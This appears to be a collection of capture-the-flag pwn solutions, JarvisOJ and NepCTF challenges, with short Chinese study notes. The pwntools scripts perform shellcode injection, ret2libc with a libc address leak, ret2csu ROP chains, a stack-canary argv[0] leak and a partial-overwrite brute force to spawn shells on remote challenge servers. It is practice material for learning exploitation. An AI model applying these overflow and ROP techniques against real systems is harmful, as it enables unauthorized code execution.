level1
#!/usr/bin/env python3
from pwn import *
context(os="linux", arch="i386", log_level="debug")
content = 1
def main():
if content == 0:
io = process("./level1.80eacdcd51aca92af7749d96efad7fb5")
else:
io = remote("pwn2.jarvisoj.com",9877)
sh=io.recvuntil("\n")[14:-2]
print(sh)
shell_addr=int(sh.decode(),16)
payload =asm(shellcraft.sh())
payload+=(0x88+4-len(payload))*b'a'
payload+=p32(shell_addr)
io.sendline(payload)
io.interactive()
main()
level3
重新做这个题弄懂了接收地址时以及p32,p64,p16的一些细节
#!/usr/bin/env python3
from pwn import *
context(os="linux", arch="i386", log_level="debug")
content = 1
#elf
elf=ELF("level3")
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x8048484
#libc
libc=ELF("libc-2.19.so")
write_libc=libc.symbols['write']
sys_libc=libc.symbols['system']
binsh_libc=next(libc.search(b'/bin/sh'))
def main():
if content == 0:
io = process("./level3")
else:
io = remote("pwn2.jarvisoj.com",9879)
payload =b'a'*(0x88+4)
payload+=p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(8)
#leak
io.sendlineafter("Input:\n",payload)
#addr=io.recvline()[:-7]
addr=io.recv(8)
#addr=io.recv(4)
print(addr)
#addr=addr.ljust(8,b'\x00')
print(addr)
#write_addr=u32(addr)
write_addr=u64(addr)
print(write_addr)
#count
libcbase=write_addr-write_libc
sys_addr=libcbase+sys_libc
binsh_addr=libcbase+binsh_libc
#getshell
payload=b'a'*(0x88+4)+p32(sys_addr)+b'aaaa'+p32(binsh_addr)
io.sendline(payload)
io.interactive()
main()
level3_x64
x64位程序调用函数一般应该使用万能gadget(ret2csu)控制参数
这个题ROPgadget中只能控制rdi和rsi,无法控制rdx,但由于调用read函数时rdx被置于0x200h,并且没有改变,rdx大于8,因此能够leak出我们所需地址,因此可以不用csu解题
这里练习一下ret2csu,
#!/usr/bin/env python3
from pwn import *
#rdi rsi rdx(0x200h) libc
#wn_gadget
context(os="linux", arch="amd64", log_level="debug")
content = 1
#elf
elf=ELF("level3_x64")
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x40061A
pop6_addr=0x4006AA
mov3_addr=0x400690
pop_rdi=0x4006b3
#libc
libc=ELF("libc-2.19.so")
write_libc=libc.symbols['write']
sys_libc=libc.symbols['system']
binsh_libc=next(libc.search(b'/bin/sh'))
def csu(r12,r13,r14,r15,ret):
payload =b'a'*(0x80+8)
payload+=p64(pop6_addr)+p64(0)+p64(1)
payload+=p64(r12)+p64(r13)+p64(r14)+p64(r15)
payload+=p64(mov3_addr)
payload+=b'a'*(56)
payload+=p64(ret)
io.sendline(payload)
sleep(1)
def main():
global io
if content == 0:
io = process("./level3_x64")
else:
io = remote("pwn2.jarvisoj.com",9883)
#leak
io.recvuntil("Input:\n")
csu(write_got,8,write_got,1,main_addr)
addr=io.recv(8)
print(addr)
write_addr=u64(addr)
print(write_addr)
#count
libcbase=write_addr-write_libc
sys_addr=libcbase+sys_libc
binsh_addr=libcbase+binsh_libc
#getshell
io.recvuntil("Input:\n")
payload=b'a'*(0x80+8)+p64(pop_rdi)+p64(binsh_addr)+p64(sys_addr)
io.sendline(payload)
io.interactive()
main()
smashes
canary:ssp攻击(故意触发___stack_chk_fail,覆盖argv[0],输出已知地址字符串)
flag地址被重映射到了别的地方,可以用pwndbg search 字符串
命令或peda find 字符串
命令,找到重映射的地址
#!/usr/bin/env python3
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
content = 1
def main():
if content == 0:
io = process("./smashes.44838f6edd4408a53feb2e2bbfe5b229")
else:
io = remote("pwn.jarvisoj.com",9877)
payload =p64(0x0400d20)*0x200
io.recvuntil("Hello!\nWhat's your name? ")
io.sendline(payload)
io.interactive()
main()
easystack(nepctf)
和smashes一个知识点
#!/usr/bin/env python3
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
content = 1
def main():
if content == 0:
io = process("./easystack")
else:
io = remote("node2.hackingfor.fun",35241)
payload = p64(0x6cde20)*100
io.sendline(payload)
io.interactive()
main()
[签到] 送你一朵小红花 (nepctf)
知识点:
1.malloc开了0x18空间,而栈只有0x10空间
2.地址随机化,低位覆盖
#!/usr/bin/env python3
from pwn import *
context(log_level="debug")
while 1:
p = remote('node2.hackingfor.fun',32045)
p.send(b'a'*(0x10)+p8(0xe1)) # p16(0x4e1),由于pie地址随机化,只需覆盖地位地址
res = p.recvall()
if b"Nep{" in res:
break
print (res)